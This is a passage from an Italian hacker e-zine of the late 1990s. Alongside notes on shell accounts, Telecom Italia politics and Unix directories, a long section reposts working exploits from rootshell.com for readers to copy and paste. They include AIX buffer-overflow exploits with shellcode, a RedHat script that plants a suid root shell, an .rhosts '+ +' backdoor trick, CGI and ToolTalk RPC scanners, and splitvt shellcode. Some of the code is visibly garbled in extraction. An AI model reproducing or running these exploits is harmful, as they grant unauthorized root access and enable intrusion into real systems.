"emacs", sia per la sua potenza che per la sua facilita' d'uso, anche se i vecchi linuxers andranno subito per "vi", eheheh... ormai la questione e' prettamente filosofica! L'ultimo passo: la scelta della login e della pass, e poi siete a posto, avete la vostra shell, ripeto, che va benissimo per i vostri primi esperimenti di newbie (e lo siete, altrimenti avreste saltato a pie' pari quest'articolo eheheh!) ma che poi dovrete abbandonare per rimpiazzarla con la vostra shell di fiducia che vi permette i servizi citati nella parte 4ø. Ecco, sono giunto alla fine, la prossima volta ci potrebbe stare un articoletto che spiega come mandare mail anonime, post anonimi sui newsgroup, come usare telnet e servizi associati e cosa potete fare di carino sfruttando una shell. :-) Come direbbe il Duka, have fun! fritz ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ PROGETTO FUCKTEL - TELECOZZ E ALTRE INFO MOLTO UTILI ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Allora premetto che sto progetto e' da poco iniziato e da poco ho ottenuto risulati soddisfacenti allora partiamo a spiegarlo. Green una brutta parola per molti [i numeri x collegarsi] e forse anche per me. Mha prendiamo in considerazione di avere questi strumenti un caro numero PBX e un green carino da qui nasce il progetto fucktel Bhe che palle ogni volta fare 100 operazioni x usarli mha forse un caro prog puo' risolevre la sistuzione e se consideriamo di fare na bella cosa x esempio: PBX-PBX-NUMERO ci si complica la vita bhe sto facendo un prog carino che risolva il problema e mi sta aituando per fortuna un mio amico telecom. Na cosa so per certo che a telecom dal 22marzo molti software verranno aggiornati con alcuni veramente bastardi , spero [ma forse non sara' cosi'] di poterveli fornire]. NUOVI SOFTWARE LINUX Allora premetto che non sono uno specialista in tutto cio' ma ho trovato dei prog veramente interessanti da scaricare prima di tutto e' uscito l' upgrade per la versione del winamp presa in considerazione nel primo numero , su www.linux.box.sk sono usciti aggiornamenti per gli scanner e per quanto riguarda l' emulazione di windowz , una bellissima gui che vi consiglio e'il KDE che trovo fantastica io la ho trovata nel cd di inter-net di febbraio insieme alla SuSe 6.0 . Bha e' stao migliorato il supporto per la versione delle direct x x linux che potete scaricare sempre da www.linux.box.sk. Bhe anche stavolta ho finito di dirvi le cose che mi interessavano se volete la prossima volta ci dedico + spazio Ciao ZeroCool QUESTO MONDO INFINITO DI EXPLOIT Bhe ho scaricato un bel po' di exploi nuovi di pacco da www.rootshell.com e vi mando sta mega lista con relative spiegazioni Allora iniziamo: WIN98: I'm not sure about the details of this problem, but when testing another buffer overflow, I created a long filename called "testfile.txt "(note the chr(160)'s at the end) It is 235 characters in length. After creating it on my desktop, I right clicked on it; explorer crashed saying it caused an illegal operation. The only way I found to close this was by using command.com. I sent this to a friend and he got the same error. Bhe penso che questo lo abbaimo capito tutti se noi facciamo un file con 160 carratteri alla fine causa un operazione illegale e crasha LINUZ: /* There is a buffer overflow in /usr/dt/bin/dtterm and/or in libXt which spawns a root shell. Solution: #chmod -s /usr/dt/bin/dtterm to continue working. ; dtterm seems Tested on AIX 4.2 RS/6000 box. */ /*----cut here--------AIX 4.2,(others?) dtterm exploit by Georgi Guninski ---------------------------------------DISCLAIMER This program is for educational purpose ONLY. Do not use it without permission. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, his employer or any Internet provider bears NO responsibility for content or misuse of this program or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of this program is not Georgi Guninski's responsibility. In case you distribute this, please keep the disclaimer and my addresses. ----------------------------------------Use the IBM C compiler. Compile with: cc -g aixdtterm.c Some brute forcing may help. DISPLAY should be set to a valid display. SOLUTION: #chmod -s /usr/dt/bin/dtterm ; dtterm seems to continue working? ----------------Georgi Guninski [email protected] [email protected] [email protected] http://www.geocities.com/ResearchTriangle/1711 Suggestions,comments and job offers are welcome! 20-MAY-97 */ #include <stdio.h> #include <stdlib.h> #include <string.h> char prog[100]="/usr/dt/bin/dtterm"; char prog2[30]="dtterm"; extern int execv(); char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) {perror("error allocating"); exit(2);}; strcpy(c,name); strcat(c,"="); strcat(c,value); putenv(c); return c; } /*The program*/ main(int argc,char **argv,char **env) /*The code*/ unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 0x60632c48 , 0x90610440 , 0x3c60d002 0x90610444 , 0x3c602f62 , 0x6063696e { , 0x3c60f019 , , 0x60634c0c , , 0x90610438 , 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; /* disassembly 7c0802a6 mfspr r0,LR 9421fbb0 stu SP,-1104(SP) --get stack 90010458 st r0,1112(SP) 3c60f019 cau r3,r0,0xf019 --CTR 60632c48 lis r3,r3,11336 --CTR 90610440 st r3,1088(SP) 3c60d002 cau r3,r0,0xd002 --TOC 60634c0c lis r3,r3,19468 --TOC 90610444 st r3,1092(SP) 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01' 6063696e lis r3,r3,26990 90610438 st r3,1080(SP) 3c602f73 cau r3,r0,0x2f73 60636801 lis r3,r3,26625 3863ffff addi r3,r3,-1 9061043c st r3,1084(SP) --terminate with 0 30610438 lis r3,SP,1080 7c842278 xor r4,r4,r4 --argv=NULL 80410440 lwz RTOC,1088(SP) 80010444 lwz r0,1092(SP) --jump 7c0903a6 mtspr CTR,r0 4e800420 bctr --jump */ #define MAXBUF 600 unsigned int buf[MAXBUF]; unsigned int frame[MAXBUF]; unsigned int i,nop,mn; int max; int QUIET=0; int dobuf=0; unsigned int toc; unsigned int eco; unsigned int *pt; char *t; int ch; unsigned int reta; /* return address */ int corr=1000; char *args[4]; char *arg1="-ms"; char *newenv[8]; int startwith=0; mn=200; max=300; if (argc>1) corr = atoi(argv[1]); pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) ) { perror("Bad parameters"); exit(1); } #define OO 7 *((unsigned short *((unsigned short *((unsigned short *((unsigned short 0x0000ffff); *)code *)code *)code *)code + + + + OO + 2)=(unsigned short) (toc & 0x0000ffff); OO)=(unsigned short) ((toc >> 16) & 0x0000ffff); OO + 8 )=(unsigned short) (eco & 0x0000ffff); OO + 6 )=(unsigned short) ((eco >> 16) & reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr; for(nop=0;nop<mn;nop++) buf[nop]=startwith ? reta : 0x4ffffb82; strcpy((char*)&buf[nop],(char*)&code); i=nop+strlen( (char*) &code)/4-1; /*NOP*/ if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000)) { perror("Return address has zero"); exit(5); } while(i++<max) buf[i]=reta; buf[i]=0; for(i=0;i<max-1;i++) frame[i]=reta; frame[i]=0; if(QUIET) { puts((char*)&buf); fflush(stdout); exit(0); }; /* 4 vars 'cause the correct one should be aligned at 4bytes boundary */ newenv[0]=createvar("EGGSHEL",(char*)&buf[0]); newenv[1]=createvar("EGGSHE2",(char*)&buf[0]); newenv[2]=createvar("EGGSHE3",(char*)&buf[0]); newenv[3]=createvar("EGGSHE4",(char*)&buf[0]); newenv[4]=createvar("DISPLAY",getenv("DISPLAY")); newenv[5]=NULL; args[0]=prog2; args[1]=arg1; args[2]=(char*)&frame[0]; /* Just frame pointers */ puts("Start...");/*Here we go*/ execve(prog,args,newenv); perror("Error executing execve \n"); /* Georgi Guninski [email protected] [email protected] [email protected] http://www.geocities.com/ResearchTriangle/1711 */ } /* -------sometimes this helps----------------------#!/bin/ksh L=20 O=40 while [ $L -lt 12000 ] do echo $L L=`expr $L + 144` ./a.out $L done */ Bhe questo [ma potete anche leggervelo dalla descrizione di da' na shell root. CGI: /* [ http://www.rootshell.com/ ] */ /* Tested on Slackware linux with kernel 2.0.35 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include <fcntl.h> <sys/types.h> <sys/socket.h> <netinet/in.h> <signal.h> <stdio.h> <string.h> <netdb.h> <ctype.h> <arpa/nameser.h> <sys/stat.h> <strings.h> <stdio.h> <stdlib.h> <unistd.h> <sys/socket.h> void main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin; char cgibuff[1024]; char *buff[50]; /* Don't u think 50 is enought? */ char *cginame[50]; /* Don't u think 50 is enought? */ buff[1] = "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[2] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[3] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[4] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[5] = "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[6] = "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[7] = "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[8] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[9] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[10] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[11] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[12] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[13] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; cginame[1] = "phf"; cginame[2] = "Count.cgi"; cginame[3] = "test-cgi"; cginame[4] = "php.cgi"; cginame[5] = "handler"; cginame[6] = "webgais"; cginame[7] = "websendmail"; cginame[8] = "webdist.cgi"; cginame[9] = "faxsurvey"; cginame[10] = "htmlscript"; cginame[11] = "pfdisplay"; cginame[12] = "perl.exe"; cginame[13] = "wwwboard.pl"; if (argc<2) { printf("\nusage : %s host ",argv[0]); printf("\n Or : %s host -d for debug mode\n\n",argv[0]); exit(0); } if (argc>2) { if(strstr("-d",argv[2])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n\n\t\t [CKS & Fdisk]'s CGI Checker\n\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n\n\t [ Press any key to check out the httpd version...... ]\n"); getchar(); send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n"); getchar(); while(count++ < 13) /* Change 13 to how many buff[?] u have above */ { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cginame[count]); for(numin=0;numin < 1024;numin++) { cgibuff[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, cgibuff, sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if( cgistr != NULL) printf("Found !! ;)\n"); else printf("Not Found\n"); if(debugm==1) { printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff); printf("Press any key to continue....\n"); getchar(); } close(sock); } } Bhe i soliti pacchi nelle cgi .... Ottimo SHADOW: #include <pwd.h> main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } Mha chissa a che serve AIX: /* Hello all There seem to exist a buffer overflow condition in AIX 4.2/4.1/? when the shell variable LC_MESSAGES is long enough. /bin/host and /usr/sbin/mount are vulnerable to spawning a root shell. Solutions: 1) IBM was informed on 972903 and on 970403 wrote the following: >The APARs are going through the regression test lab right now and should >be available by next week. Here are the numbers: > AIX 4.2: APAR IX67377 > AIX 4.1: APAR IX67407 > AIX 3.2: APAR IX67405 2) a little bit ugly, but works: #chmod -s /bin/host /usr/sbin/mount 3) I have not tested it, but if you are in the mood you may try to change LC_MESSAGES in /usr/lib/libc.a, /usr/lib/ and everywhere else to something unpredictable. If the C program does not work, try the ksh script which does some brute forcing. PLEASE NOTE my e-mail addresses bellow and do NOT REPLY to this message. Georgi Guninski [email protected] [email protected] [email protected] http://www.geocities.com/ResearchTriangle/1711 ---test2.c---------------------------------------------------------------------*/ /* AIX 4.2/4.1 LC_MESSEGAS /usr/sbin/mount exploit by Georgi Guninski ---------------------------------------DISCLAIMER This program is for educational purpose ONLY. Do not use it without permission. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, his employer or any Internet provider bears NO responsibility for content or misuse of this program or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of this program is not Georgi Guninski's responsibility. In case you distribute this, please keep the disclaimer and my addresses. ----------------------------------------- Use the IBM C compiler. Compile with: cc -g test2.c ----------------Georgi Guninski [email protected] [email protected] [email protected] http://www.geocities.com/ResearchTriangle/1711 Suggestions,comments and job offers are welcome! 22-Mar-97 */ #include <stdio.h> #include <stdlib.h> #include <string.h> char prog[100]="/usr/sbin/mount"; char prog2[30]="mount"; extern int execv(); char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) { perror("error allocating"); exit(2); }; strcpy(c,name); strcat(c,"="); strcat(c,value); putenv(c); return c; } /*The program*/ main(int argc,char **argv,char **env) { /*The code*/ unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 0x60632c48 , 0x90610440 , 0x3c60d002 0x90610444 , 0x3c602f62 , 0x6063696e 0x3c602f73 , 0x60636801 , 0x3863ffff 0x30610438 , 0x7c842278 , 0x80410440 0x7c0903a6 , 0x4e800420, 0x0 }; /* disassembly 7c0802a6 mfspr r0,LR 9421fbb0 stu SP,-1104(SP) 90010458 st r0,1112(SP) 3c60f019 cau r3,r0,0xf019 60632c48 lis r3,r3,11336 90610440 st r3,1088(SP) 3c60d002 cau r3,r0,0xd002 60634c0c lis r3,r3,19468 90610444 st r3,1092(SP) 3c602f62 cau r3,r0,0x2f62 6063696e lis r3,r3,26990 90610438 st r3,1080(SP) 3c602f73 cau r3,r0,0x2f73 60636801 lis r3,r3,26625 3863ffff addi r3,r3,-1 , , , , , 0x3c60f019 0x60634c0c 0x90610438 0x9061043c 0x80010444 , , , , , --get stack --CTR --CTR --TOC --TOC --'/bin/sh\x01' 9061043c 30610438 7c842278 80410440 80010444 7c0903a6 4e800420 st lis xor lwz lwz mtspr bctr r3,1084(SP) --terminate with 0 r3,SP,1080 r4,r4,r4 --argv=NULL RTOC,1088(SP) r0,1092(SP) --jump CTR,r0 --jump */ #define MAXBUF 600 unsigned int buf[MAXBUF]; unsigned int frame[MAXBUF]; unsigned int i,nop,mn; int max; int QUIET=0; int dobuf=0; char VAR[30]="LC_MESSAGES"; unsigned int toc; unsigned int eco; unsigned int *pt; char *t; int egg=1; int ch; unsigned int reta; /* return address */ int corr=4604; char *args[4]; char *newenv[8]; int justframes=1; int startwith=0; mn=78; max=100; if (argc>1) corr = atoi(argv[1]); pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) ) { perror("Bad parameters"); exit(1); } #define OO 7 *((unsigned short *((unsigned short *((unsigned short *((unsigned short 0x0000ffff); *)code *)code *)code *)code + + + + OO + 2)=(unsigned short) (toc & 0x0000ffff); OO)=(unsigned short) ((toc >> 16) & 0x0000ffff); OO + 8 )=(unsigned short) (eco & 0x0000ffff); OO + 6 )=(unsigned short) ((eco >> 16) & reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr; for(nop=0;nop<mn;nop++) buf[nop]=startwith ? reta : 0x4ffffb82; strcpy((char*)&buf[nop],(char*)&code); i=nop+strlen( (char*) &code)/4-1; /*NOP*/ if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000)) { perror("Return address has zero"); exit(5); } while(i++<max) buf[i]=reta; buf[i]=0; for(i=0;i<max-1;i++) frame[i]=reta; frame[i]=0; if(QUIET) { puts((char*)&buf); fflush(stdout); exit(0); }; puts("Start...");/*Here we go*/ newenv[0]=createvar("EGGSHEL",(char*)&buf[0]); newenv[1]=createvar("EGGSHE2",(char*)&buf[0]); newenv[2]=createvar("EGGSHE3",(char*)&buf[0]); newenv[3]=createvar("EGGSHE4",(char*)&buf[0]); newenv[4]=createvar("DISPLAY",getenv("DISPLAY")); newenv[5]=VAR[0] ? createvar(VAR,justframes ? (char*)&frame : (char*)&buf):NULL; newenv[6]=NULL; } args[0]=prog2; execve(prog,args,newenv); perror("Error executing execve \n"); /* Georgi Guninski [email protected] [email protected] [email protected] http://www.geocities.com/ResearchTriangle/1711 */ /* ------------brute-ksh-script---------------------------------------------------#!/bin/ksh L=3000 STEP=34 MAX=16000 while [ $L -lt $MAX ] do ./a.out $L L=`expr $L + $STEP` done -------------------------------------------------------------------------------*/ UNIXWARE 2.x * Post to BoS - try this with an account on a Unixware 2.x box. */ /* And here's another Unixware exploit. Should get you grp */ /* 23456 which will get you /usr/bin etc., etc., */ /* % cp /usr/bin/ksh . */ /* % chmod 2700 ./ksh */ /* % chgrp 23456 ./ksh */ /* % ./ksh */ /* > id */ /* */ #include #include #include #include #include #include <sys/types.h> <sys/stat.h> <stdio.h> <string.h> <time.h> <unistd.h> #define KEYMATCH "\x1D\xFC\x3A\x2FMZ" #define TESTGRP 17186 int main(int argc, char **argv) { struct stat st, *s = &st; pid_t p; if (argc == 2 && !strcmp(argv[1], KEYMATCH)) { if (getegid() == TESTGRP) { unsigned long r; } else { srandom(time(NULL)); r = (unsigned long)random(); r = (r & 0xFFFF00FF) | ((r & 0xFF000000 >> 16) ^ (r & 0x00FF0000 >> 8) ^ (r & 0x000000FF << 8)); fprintf(stderr, "%s: system vulnerable code 0x%lX\n", argv[0], r); fprintf(stderr, "%s: system not vulnerable\n", argv[0]); } return 0; } if (argc > 1) { fprintf(stderr, "%s: don't supply any arguments\n", argv[0]); return 0; } if (!strchr(argv[0], '/')) { fprintf(stderr, "%s: user error: run me with a pathname, not in $PATH\n", argv[0]); return 0; } if (stat(argv[0], s)) { fprintf(stderr, "%s: system error: cannot stat my binary?\n", argv[0]); return 0; } if (s->st_uid != geteuid() && s->st_uid != getuid()) { fprintf(stderr, "%s: user error: does this uid own my binary?\n", argv[0]); return 0; } chown(argv[0], -1, TESTGRP); if (chmod(argv[0], 02700)) { chown(argv[0], -1, s->st_gid); chmod(argv[0], s->st_mode); fprintf(stderr, "%s: user error: cannot chmod my own binary?\n", argv[0]); return 0; } if ((p = vfork()) == -1) { fprintf(stderr, "%s: system error: cannot fork\n", argv[0]); return 0; } if (!p) { execl(argv[0], argv[0], KEYMATCH, NULL); fprintf(stderr, "%s: system error: cannot exec\n", argv[0]); _exit(0); } chown(argv[0], -1, s->st_gid); chmod(argv[0], s->st_mode); return 0; } UN BELLO SCANNER : /* [ http://www.rootshell.com/ ] Black Angel proudly presents : -----------------------------TOOLTALK-RPC Scanner V1.1 Syntax : ./toolscan 195.3.90.2 196.0.0.0 [1] ^ | Start-IP ^ | End-IP ^ | ToolTalk-RPC Version If you don't specify any version number, the program will scan for any version. I really don't know whether there are any versions beside the vulnerable version 1, so I included this little feature (sorry for this lack of knowledge). What it does : Concerning 'CERT CA-98.11 tooltalk' there is a overflow in the tooltalk database server - runing root, which allows an attacker to gain access. This little scanner scans for this RPC-service. Have fun ! */ PS : Use this program at your own risk. #include #include #include #include #include #include #include #include #include #include #include #include <sys/types.h> <sys/param.h> <sys/socket.h> <netdb.h> <stdio.h> <getopt.h> <string.h> <rpc/rpc.h> <rpc/pmap_clnt.h> <arpa/inet.h> <utmp.h> <stdlib.h> #define TOOLTALK_RPC 100083 main (int argc, char *argv[]) { long counter; struct in_addr addr; unsigned long start; unsigned long end; int version = -1; printf ("Black Angel's ToolTalk RPC Scanner V1.1 9/1998 :\n"); printf ("See CERT CA-98.11 tooltalk for more information\n"); printf ("E-Mail : [email protected] - [ http://www.rootshell.com/ ]\n\n"); if (argc == 4) { version = atoi (argv[3]); } else { if (argc != 3) { printf ("\nusage : %s start-ip-address [RPC_VERSION]\n\n", argv[0]); exit (0); } } end-ip-address start = inet_addr (argv[1]); end = inet_addr (argv[2]); for (counter = ntohl (start); counter <= ntohl (end); counter++) { if ((counter & 0xff) == 255) counter++; if ((counter & 0xff) == 0) counter++; addr.s_addr = htonl (counter); if (version == -1) { if (callrpc (inet_ntoa (addr), TOOLTALK_RPC, version, 0, (xdrproc_t) xdr_void, (caddr_t) NULL, (xdrproc_t) xdr_void, (caddr_t) NULL) == 9) { } else { } fprintf (stdout, "Found ToolTalk : %s\n", inet_ntoa (addr)); fflush (stdout); if (callrpc (inet_ntoa (addr), TOOLTALK_RPC, version, 0, (xdrproc_t) xdr_void, (caddr_t) NULL, (xdrproc_t) xdr_void, (caddr_t) NULL) == 0) { fprintf (stdout, "Found ToolTalk Version %d : %s\n", version, inet_ntoa (addr)); fflush (stdout); } } } } REDHAT 2.1 There is a security hole in RedHat 2.1, which installs the game abuse, /usr/lib/games/abuse/abuse.console suid root. The abuse.console program loads its files without absolute pathnames, assuming the user is running abuse from the /usr/lib/games/abuse directory. One of these files in the undrv program, which abuse executes as root. If the user is not in the abuse directory when running this, an arbitrary program can be substituted for undrv, allowing the user to execute arbitrary commands as root. If abuse.console needs to be run by users other than root at the console, provisions need to be made in the code to not execute or load any files as root. Program: Affected Operating Systems: Requirements: Patch: Security Compromise: Author: Synopsis: /usr/lib/games/abuse/abuse.console suid root Red Hat 2.1 linux distribution account on system chmod -s /usr/lib/games/abuse/abuse.console root Dave M. ([email protected]) abuse.console runs undrv without an absolute pathname while executing as root, allowing a user to substitute the real undrv with an arbitrary program. Exploit: #!/bin/sh # # abuser.sh # exploits a security hole in abuse to create # a suid root shell /tmp/abuser on a linux # Red Hat 2.1 system with the games package # installed. # # For release 2/2/96 - 1 drink credit please. # # by Dave M. ([email protected]) # echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system echo ================ Checking system vulnerability if test -u /usr/lib/games/abuse/abuse.console then echo ++++++++++++++++ System appears vulnerable. cd /tmp cat << _EOF_ > /tmp/undrv #!/bin/sh /bin/cp /bin/sh /tmp/abuser /bin/chmod 4777 /tmp/abuser _EOF_ cat << _EOF_ >> /tmp/the_wall so ya thought ya might like to go to the show to feel the warm thrill of confusion that space cadet glow tell me is something eluding you sunshine? is this not what you expected to see? if you wanna find out what's behind these cold eyes you'll just have to claw your way through this disguise _EOF_ chmod +x /tmp/undrv PATH=/tmp echo ================ Executing Abuse /usr/lib/games/abuse/abuse.console /bin/rm /tmp/undrv /bin/rm /tmp/the_wall if test -u /tmp/abuser then echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser else echo ---------------- Exploit failed fi else echo ---------------- This machine does not appear to be vulnerable. fi ADMIN TOOL: setenv DISPLAY yourdisplay:0.0 ln -s /.rhosts /tmp/.group.lock /usr/bin/admintool (browse -> group -> edit a group -> get an error message -> exit) echo "+ +" >> .rhosts /usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)" WEBSITESPOOF: #!/bin/bash # ###################################################################### # WebSideSpoof.sh Written by RSnake (7/17/1998) # Come and visit: http://www.webfringe.com !!! # # # # # # # # # # # # # # # # # Sanitized and made LUSER-friendly by Tattooman (7/19/98) Run with these commands at your shell account prompt: chmod 700 webside_spoof.sh webside_spoof.sh 4000 5 Where '4000' is the amount of times you wish to spoof - must not be larger than '999999' and must be a multiple of 4 for most reliable (pretty looking) output. Also '5' is the delay between spoofs. You'll probably want to keep the delay at '1' or above unless you are running this script on a Cray. The load stays below 2 on a 133 Linux box with a delay of '1'. Replace the 'url' line with YOUR WebSideStory cgi link: ###################################################################### url=http://w12.hitbox.com/wc3/W123456789.cgi x=$1 while [ $x -gt 0 ] do lynx -dump $url > /dev/null & x=$(($x-1)) echo -n $x ' ' sleep $2 done echo && echo Done. SPLITVT: syntax: %cc -o sl sl.c %sl bash#sl bash#splitvt #whoami root -------------------------------long get_esp(void) { __asm__("movl %esp,%eax\n"); } main() { char eggplant[2048]; int a; char *egg; long *egg2; char realegg[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *eggie = realegg; egg = eggplant; *(egg++) *(egg++) *(egg++) *(egg++) *(egg++) = = = = = 'H'; 'O'; 'M'; 'E'; '='; egg2 = (long *)egg; for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30; egg=(char *)egg2; for (a=0;a<0x40;a++) *(egg++) = 0x90; while (*eggie) *(egg++) = *(eggie++); *egg = 0; /* terminate eggplant! */ putenv(eggplant); } system("/bin/bash"); Bhe ora vi lascio al bel copia incolla ciao ciao ZeroCool [volevo metterle ringraziando rootsheel che lo ha concesso x darvi anche se non sono lavori nostri un poco di info e di aggiornamenti nel caso uno non si documenti]. TELECOZZ MA QUANTI CAMBIAMENTI: Raga mentre sto scrivendo questo articolo sono molto depresso a causa sulle mie opinioni presonali sul fatto. Prima di tutto si parlava di una magica fusione [o meglio acquisto] da parte di una societa' di telecazz ma per ora telecom ha solo risaldato il suo monopolio con la fusione con tim mha mica giusto. Speriamo che questo porti a miglioramenti per quanto riguarda internet [hihihi io non ci credo x nulla] . Si parla anche di un decreto inserito nella finanziaria attuale bhe proprio di questo volevo parlarvi. Allora in sto cazz di decreto si vuole proporre [ o meglio fissare la connessione a internet in uno scatto che durera' per un numero di ore Stop tut insomma ]per cosi' dire l'abolizione della tut. MA vediamo ora le fasi x arrivare a questo risultato per capirci meglio: FASE 1: La legge finanziaria [ora superata] approvazione entro il 30 settembre e scadenza di approvazione entro il 31 dicembre] FASE 2: I provvedimenti collegati [stesse date ] fase superata FASE 3: La previsionale progrmmatica [no approvazione ] fase superata FASE 4: approvazione decreti collegati [quando cazz la fanno bho ] ed e' questa che ci interessa xche\ promulga l'approvazione di questa legge . ZeroCool `Bha io spero che la fusione tra telecazz e olivetti avvenga magari si risolevra' qualche cosa ... speriamo ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ DIRECTORY DI SISTEMA CON DESCRIZIONE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ <<<----SARDINIA HACKERS---->>> -SAPERE E' POTERE- by Zinco Vi siete mai chiesti cosa contengono tutte le directory di un sistema? Ecco la descrizione di ogni singola directory. DIRECTORY DESCRIZIONE / Punto "iniziale" della struttura delle directory; chiamato root o radice. Contiene la directory home degli utenti. Contiene i comandi e i programmi di servizio standard. Contiene i file e i comandi utilizzati dal sistema; questa directory contiene molte sottodirectory. /home /bin /usr /usr/bin /usr/sbin /usr/lib /usr/doc /usr/man /usr/spool /sbin /var /dev /etc Contiene i comandi e i programmi di servizio per gli utenti. Contiene i comandi di amministrazione del sistema. Contiene le librerie dei linguaggi di programmazione. 